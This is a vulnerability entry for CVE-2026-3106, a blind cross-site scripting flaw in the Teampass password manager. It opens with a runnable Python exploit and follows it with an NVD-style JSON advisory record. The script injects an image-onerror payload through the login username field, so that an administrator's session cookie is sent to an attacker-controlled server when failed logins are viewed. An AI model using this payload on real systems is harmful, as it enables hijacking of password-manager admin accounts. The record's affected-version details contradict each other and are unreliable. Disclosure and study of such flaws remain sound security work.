CVE-2026-3106

import requests # Target configuration target_url = "http://target-teampass-url/index.php" attacker_server = "http://attacker-controlled-server/collect" # Malicious payload to steal admin cookies # This payload will execute when the admin views the failed login logs xss_payload = f"<img src=x onerror=fetch('{attacker_server}?c='+document.cookie)>" # The vulnerable parameter is the username field (often named 'login' or similar) # which gets logged upon failed authentication. payload_data = { "login": xss_payload, "pw": "invalid_password", "stay_connected": "" } try: print("[*] Sending malicious payload to trigger failed login logging...") response = requests.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[*] Waiting for administrator to view the failed login entries...") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-3106", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:22.700", "lastModified": "2026-04-07T15:36:09.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blind Cross-Site Scripting (XSS) in Teampass, versions prior to 3.1.5.16, within the password manager login functionality in the 'contraseña' parameter of the login form 'redacted/index.php'. During failed authentication attempts, the application does not properly clean or encode the information entered by the user in the username field. As a result, arbitrary JavaScript code is automatically executed in the administrator's browser when viewing failed login entries, resulting in a blind XSS condition."}, {"lang": "es", "value": "Blind cross-site scripting (XSS) en Teampass, versiones anteriores a la 3.1.5.16, dentro de la funcionalidad de inicio de sesión del gestor de contraseñas en el parámetro 'contraseña' del formulario de inicio de sesión 'redacted/index.php'. Durante los intentos de autenticación fallidos, la aplicación no limpia ni codifica correctamente la información introducida por el usuario en el campo de nombre de usuario. Como resultado, código JavaScript arbitrario se ejecuta automáticamente en el navegador del administrador al ver las entradas de inicio de sesión fallidas, lo que resulta en una condición de XSS ciego."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.1.5.16", "versionEndExcluding": "3.1.5.24", "matchCriteriaId": "6A32E3AF-53D9-4522-8681-9E95819801F1"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-teampass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}